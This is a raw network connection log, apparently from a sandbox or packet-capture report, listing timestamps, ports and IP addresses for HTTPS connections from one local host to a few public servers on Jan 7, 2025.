                                                            Jan 7, 2025 21:28:57.556318998 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.556333065 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.556576014 CET44349718142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:28:57.556674004 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.556700945 CET49718443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:28:57.557207108 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.557292938 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.557380915 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.557565928 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.557593107 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.557800055 CET49718443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:28:57.557868004 CET44349718142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:28:57.565509081 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.604294062 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.604353905 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.604398012 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.604408979 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.604552031 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.604582071 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.604600906 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.604609013 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.604644060 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.604649067 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605166912 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605194092 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605220079 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.605226040 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605264902 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.605761051 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605815887 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605844021 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605860949 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.605868101 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605906010 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605907917 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.605921030 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.605958939 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.606641054 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.606694937 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.606724024 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.606735945 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.606743097 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.606765985 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.606785059 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.606792927 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.606832981 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.609103918 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.611488104 CET49718443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:28:57.611496925 CET44349718142.250.184.228192.168.2.16
                                                            Jan 7, 2025 21:28:57.659476042 CET49718443192.168.2.16142.250.184.228
                                                            Jan 7, 2025 21:28:57.659476995 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.659483910 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691000938 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691040039 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691067934 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.691072941 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691086054 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691174030 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.691180944 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691220045 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.691242933 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691251040 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691322088 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.691663027 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691670895 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691720009 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.691725969 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691760063 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691803932 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.691808939 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.691848040 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.692075968 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.692143917 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.692254066 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.692312002 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.692378998 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.692408085 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.692426920 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.692433119 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.692476034 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.693068027 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693124056 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.693171024 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693221092 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.693238020 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693280935 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693285942 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.693291903 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693317890 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693324089 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.693339109 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.693347931 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.693376064 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.694077015 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.694143057 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.694149017 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.694190979 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.738831997 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.738887072 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.738922119 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.738940001 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.738966942 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739011049 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.739012957 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739022970 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739078999 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.739480019 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739814043 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739846945 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739860058 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.739866018 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.739903927 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.743505955 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.777812004 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.777858973 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.777884960 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.777903080 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.777935982 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.777937889 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.777945995 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.777982950 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.778064966 CET49719443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.778078079 CET44349719104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.786494970 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.786505938 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827300072 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827368975 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.827380896 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827447891 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827482939 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827497005 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.827502966 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827548981 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.827879906 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827943087 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827977896 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.827986002 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.827991009 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.828032970 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.828037977 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.828672886 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.828715086 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.828721046 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.828726053 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.828758955 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.829025984 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829103947 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829138041 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829155922 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.829160929 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829200983 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.829205036 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829242945 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829287052 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.829293013 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.829992056 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.830024958 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.830043077 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.830049992 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.830104113 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.878048897 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:57.878314972 CET49722443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:57.878324986 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:57.878791094 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:57.879189014 CET49722443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:57.879333019 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:57.879336119 CET49722443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:57.915990114 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916059971 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916104078 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.916111946 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916279078 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916332006 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.916337013 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916373014 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916409016 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.916414022 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916464090 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916513920 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.916518927 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.916563034 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.917072058 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.917140961 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.917145967 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.917161942 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.917206049 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.917212963 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.917277098 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.917326927 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.917330980 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.917370081 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.918014050 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.918049097 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.918078899 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.918082952 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.918118000 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.918139935 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.918926001 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.918962002 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.918992043 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.919008017 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.919023991 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.919028044 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.919068098 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.919071913 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.919106960 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.919131994 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.919189930 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.919194937 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.919241905 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.919974089 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.920013905 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.920037985 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.920042992 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.920068026 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.920085907 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:57.927331924 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:57.929495096 CET49722443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:57.956975937 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:57.957102060 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.004750967 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.004837036 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.004872084 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.004873991 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.004906893 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.004951000 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.004951000 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.004951000 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.005187988 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.005248070 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.005259991 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.005317926 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.005352974 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.005408049 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.005770922 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.005811930 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.005841970 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.005846024 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.005868912 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006241083 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006278038 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006299019 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006304979 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006331921 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006401062 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006438971 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006458044 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006463051 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006473064 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006491899 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006510019 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006514072 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006555080 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006560087 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006580114 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.006619930 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006721973 CET49721443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.006736040 CET44349721104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.008249044 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:58.008347988 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:58.008394957 CET49722443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:58.009215117 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.009233952 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.009305954 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.010241985 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.010253906 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.013999939 CET49722443192.168.2.16188.114.96.3
                                                            Jan 7, 2025 21:28:58.014005899 CET44349722188.114.96.3192.168.2.16
                                                            Jan 7, 2025 21:28:58.018471003 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.018502951 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.018583059 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.018759012 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.018774033 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.273545027 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.273577929 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.273694038 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.273917913 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.273935080 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.488046885 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.488341093 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.488358021 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.488672972 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.489089966 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.489155054 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.489259005 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.501898050 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.502134085 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.502155066 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.503298998 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.503387928 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.504499912 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.504559994 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.504738092 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.504745960 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.535334110 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.557516098 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.618207932 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.618273020 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.618324995 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.618729115 CET49723443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.618741989 CET44349723104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.628899097 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.628967047 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.629030943 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.629230022 CET49724443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.629247904 CET4434972435.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.629813910 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.629833937 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.629915953 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.630201101 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:58.630211115 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:58.637515068 CET49673443192.168.2.16204.79.197.203
                                                            Jan 7, 2025 21:28:58.786448002 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.786772966 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.786782026 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.787111044 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.787447929 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.787513018 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.787569046 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.828499079 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.828509092 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.922947884 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.923024893 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.924221992 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.924691916 CET49725443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.924707890 CET44349725104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.927160025 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.927181959 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:58.927294016 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.927505016 CET49730443192.168.2.16104.18.95.41
                                                            Jan 7, 2025 21:28:58.927526951 CET44349730104.18.95.41192.168.2.16
                                                            Jan 7, 2025 21:28:59.136009932 CET4968980192.168.2.16192.229.211.108
                                                            Jan 7, 2025 21:28:59.276119947 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.276474953 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:59.276490927 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.276823044 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.277179003 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:59.277245045 CET4434972835.190.80.1192.168.2.16
                                                            Jan 7, 2025 21:28:59.277298927 CET49728443192.168.2.1635.190.80.1
                                                            Jan 7, 2025 21:28:59.319328070 CET4434972835.190.80.1192.168.2.16
